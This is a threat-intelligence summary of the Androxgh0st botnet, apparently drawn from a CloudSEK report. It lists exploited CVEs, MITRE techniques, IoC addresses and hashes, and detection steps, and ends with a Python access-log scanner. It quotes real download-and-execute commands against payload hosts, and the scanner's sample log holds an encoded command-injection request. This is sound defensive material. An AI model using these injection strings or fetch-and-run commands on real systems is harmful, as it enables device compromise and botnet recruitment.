Keypoints
- Androxgh0st has been active since January 2024, targeting web servers and IoT devices and leveraging numerous CVEs for initial access.
- The botnet exploits a broad set of vulnerabilities, including TP-Link CVE-2023-1389 and GeoServer CVE-2024-36401, plus older web-app and router CVEs (PHPUnit, Laravel .env, Apache path traversal).
- Command-and-control logs show Androxgh0st downloading and executing shell/binary payloads (e.g., androx.sh, /tmp/androx) and using wget/curl workflows similar to Mozi.
- Evidence suggests operational integration or payload reuse with the Mozi botnet, including shared command paths and payload names (Mozi.m).
- Persistent techniques include appending PHP code to files, file uploads, crontab/startup modification, and credential collection/brute force against admin panels.
- CloudSEK observed over 500 infected devices and recommends immediate patching, log review, and network/process audits to mitigate compromise.
MITRE Techniques
- [T1071] Application Layer Protocol (Command and Control tactic) – Uses multiple command-and-control domains over HTTP to maintain communication with compromised systems. [‘Utilizes multiple command and control domains to maintain communication with compromised systems.’]
- [T1210] Exploitation of Remote Services – Exploits vulnerabilities in remote services (web servers, routers, IoT management interfaces) to gain unauthorized access; because the targets described here are internet-facing applications, T1190 (Exploit Public-Facing Application) is the closer initial-access mapping. [‘Exploits vulnerabilities in remote services to gain unauthorized access.’]
- [T1003] OS Credential Dumping – Collects credentials from exposed .env files and other sources and performs brute-force logins against admin endpoints (the .env harvesting maps more precisely to T1552.001, Credentials In Files, and the admin-panel logins to T1110, Brute Force). [‘Collects credentials from compromised systems to facilitate further attacks.’]
- [T1105] Ingress Tool Transfer (formerly Remote File Copy) – Downloads and executes payloads via wget/curl (e.g., Mozi.m, androx.sh) from remote hosting servers. [‘Transfers files from a remote server to the compromised system for further exploitation.’]
- [T1102] Web Service – Uses web services and misconfigured admin/logger panels to receive commands and exfiltrate data. [‘Uses web services as a means of communication and data exfiltration.’]
Indicators of Compromise
- [IP] C2 / request logger servers – 165.22.184.66, 45.55.104.59
- [IP] Payload download servers – 154.216.17.31 (TP-Link downloads), 200.124.241.140 (Netgear Mozi.m), and 45.202.35.24
- [Domain] Command/logger domain – api.next.eventsrealm.com (used as a command sender/logger)
- [File names] Downloaded/executed payloads – Mozi.m, androx.sh, /tmp/androx
- [File hashes] Androxgh0st TP-Link payload MD5s – 2403a89ab4ffec6d864ac0a7a225e99a, d9553ca3d837f261f8dfda9950978a0a, and 15 more hashes
Androxgh0st gains initial access by scanning for and exploiting known web-application and IoT/firmware CVEs (examples: PHPUnit eval-stdin, Laravel .env exposure, Apache path traversal, Metabase GeoJSON LFI, PHP-CGI argument injection CVE-2024-4577, TP-Link CVE-2023-1389, GeoServer CVE-2024-36401). Successful exploitation yields arbitrary file upload, remote code execution, or command injection; the operators then upload or trigger small shell scripts that fetch and run architecture-specific binaries via wget or curl (observed examples: commands to fetch http://154.216.17[.]31/ tarm* and wget http://200.124.241[.]140:44999/Mozi.m -O /tmp/netgear; sh netgear).
Post-compromise actions include appending PHP backdoor code to existing .php files, deploying persistent scripts (crontab or startup scripts), brute-forcing admin panels (WordPress /wp-login.php, /admin_login), credential harvesting from exposed .env files, and executing downloaded binaries (chmod +x; ./binary). C2 communications and control flows are implemented over multiple domains and HTTP POST/GET interfaces; Androxgh0st shows TTP overlap with Mozi (same command injection paths, payload download patterns, and filenames), indicating payload reuse or integration.
Detection and remediation steps:
- Review web server access logs for GET/POST requests whose path or query string contains wget/curl or command injection patterns (e.g., ?command=ping;wget http://…/androx.sh), and for requests to known exploit endpoints such as PHPUnit eval-stdin.php and /.env.
- Check for repeated login attempts from a single source against admin endpoints (/wp-login.php, /admin_login).
- Inspect /tmp, /var/tmp, and /dev/shm for executable or recently modified files (the observed drop locations are /tmp/androx and /tmp/netgear).
- Audit crontab and startup scripts for unauthorized entries, and check .php files for appended backdoor code.
- Monitor outbound connections to the IPs and domain listed above.
- Run EDR and file-integrity checks, and prioritize patching of the listed vulnerable products and CVEs.
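The log-review step above, worked as an added example rather than code from the CloudSEK report: a small Python scanner that parses combined-format access-log lines, URL-decodes each request, and flags the patterns the text describes (wget/curl chained into a command parameter, path traversal, the PHPUnit eval-stdin and /.env endpoints, the payload names and the IoC addresses listed above), then counts POSTs to the admin endpoints per source to surface brute forcing. The log lines are constructed for the example; the /cgi-bin/ping.cgi path and the source addresses are illustrative, not observed indicators.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Indicators copied from the IoC list above.
IOC_IPS = {"165.22.184.66", "45.55.104.59", "154.216.17.31", "200.124.241.140", "45.202.35.24"}
IOC_DOMAINS = {"api.next.eventsrealm.com"}
PAYLOAD_NAMES = ("androx.sh", "/tmp/androx", "Mozi.m")

# Exploit endpoints named in the text; the PHPUnit path is the standard eval-stdin.php location.
EXPLOIT_PATHS = ("/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php", "/.env")
ADMIN_ENDPOINTS = ("/wp-login.php", "/admin_login")

# Apache/Nginx combined log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
# Applied to the URL-decoded request: a download tool after a separator, or a separator
# followed by a shell interpreter (the "...;sh netgear" pattern), and ../ traversal.
INJECTION_RE = re.compile(r'(?:^|[;&|`\s])(?:wget|curl)\s|[;&|]\s*(?:sh|bash)\b', re.I)
TRAVERSAL_RE = re.compile(r'\.\./')

# Constructed sample log (not real captures): one injection, one PHPUnit probe, one .env
# read, one traversal attempt, one benign request, then six login POSTs from one source.
SAMPLE_LOG = (
    '203.0.113.10 - - [12/Nov/2024:10:01:02 +0000] "GET /cgi-bin/ping.cgi?command=ping%3Bwget%20'
    'http%3A%2F%2F154.216.17.31%2Fandrox.sh%20-O%20%2Ftmp%2Fandrox%3Bsh%20%2Ftmp%2Fandrox HTTP/1.1" '
    '200 512 "-" "Mozilla/5.0"\n'
    '203.0.113.11 - - [12/Nov/2024:10:02:15 +0000] "POST /vendor/phpunit/phpunit/src/Util/PHP/'
    'eval-stdin.php HTTP/1.1" 200 88 "-" "python-requests/2.31"\n'
    '203.0.113.11 - - [12/Nov/2024:10:02:16 +0000] "GET /.env HTTP/1.1" 200 1203 "-" "python-requests/2.31"\n'
    '203.0.113.12 - - [12/Nov/2024:10:03:00 +0000] "GET /cgi-bin/.%2e/.%2e/.%2e/bin/sh HTTP/1.1" '
    '403 199 "-" "curl/8.0"\n'
    '198.51.100.7 - - [12/Nov/2024:10:04:00 +0000] "GET /index.php HTTP/1.1" 200 4311 "-" "Mozilla/5.0"\n'
) + "".join(
    f'203.0.113.13 - - [12/Nov/2024:10:05:{i:02d} +0000] "POST /wp-login.php HTTP/1.1" 200 3500 "-" "Mozilla/5.0"\n'
    for i in range(6)
)


def parse_line(line):
    """Parse one combined-format line; returns a dict or None if the line does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    # Decode once so %3B / %2e style encoding cannot hide the payload from the regexes.
    rec["decoded_url"] = unquote_plus(rec["url"])
    return rec


def classify(rec):
    """Return the names of every rule that matches one parsed request (empty if clean)."""
    url = rec["decoded_url"]
    path = url.split("?", 1)[0]
    hits = []
    if INJECTION_RE.search(url):
        hits.append("command_injection_download")
    if TRAVERSAL_RE.search(url):
        hits.append("path_traversal")
    if any(path.endswith(p) for p in EXPLOIT_PATHS):
        hits.append("known_exploit_path")
    if any(name in url for name in PAYLOAD_NAMES):
        hits.append("known_payload_name")
    if any(ip in url for ip in IOC_IPS) or any(d in url for d in IOC_DOMAINS):
        hits.append("ioc_in_request")
    if rec["ip"] in IOC_IPS:
        hits.append("ioc_source_ip")
    return hits


def scan_log(lines, bruteforce_threshold=5):
    """Scan log lines; returns flagged requests and sources that hammer admin login endpoints."""
    findings = []
    admin_posts = Counter()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        hits = classify(rec)
        if hits:
            findings.append({"ip": rec["ip"], "url": rec["url"], "rules": hits})
        path = rec["decoded_url"].split("?", 1)[0]
        if rec["method"] == "POST" and any(path.endswith(e) for e in ADMIN_ENDPOINTS):
            admin_posts[rec["ip"]] += 1
    bruteforce = {ip: n for ip, n in admin_posts.items() if n >= bruteforce_threshold}
    return {"findings": findings, "bruteforce": bruteforce}


if __name__ == "__main__":
    report = scan_log(SAMPLE_LOG.splitlines())
    for f in report["findings"]:
        print(f["ip"], ",".join(f["rules"]), f["url"])
    for ip, n in report["bruteforce"].items():
        print(ip, "admin login POSTs:", n)
```

Decoding before matching is the important design choice: the injection in the first sample line is fully percent-encoded, so a grep for the literal string `wget` on the raw log would miss it. The brute-force threshold is a plain count of login POSTs per source rather than a status-code check, because WordPress returns 200 on a failed login.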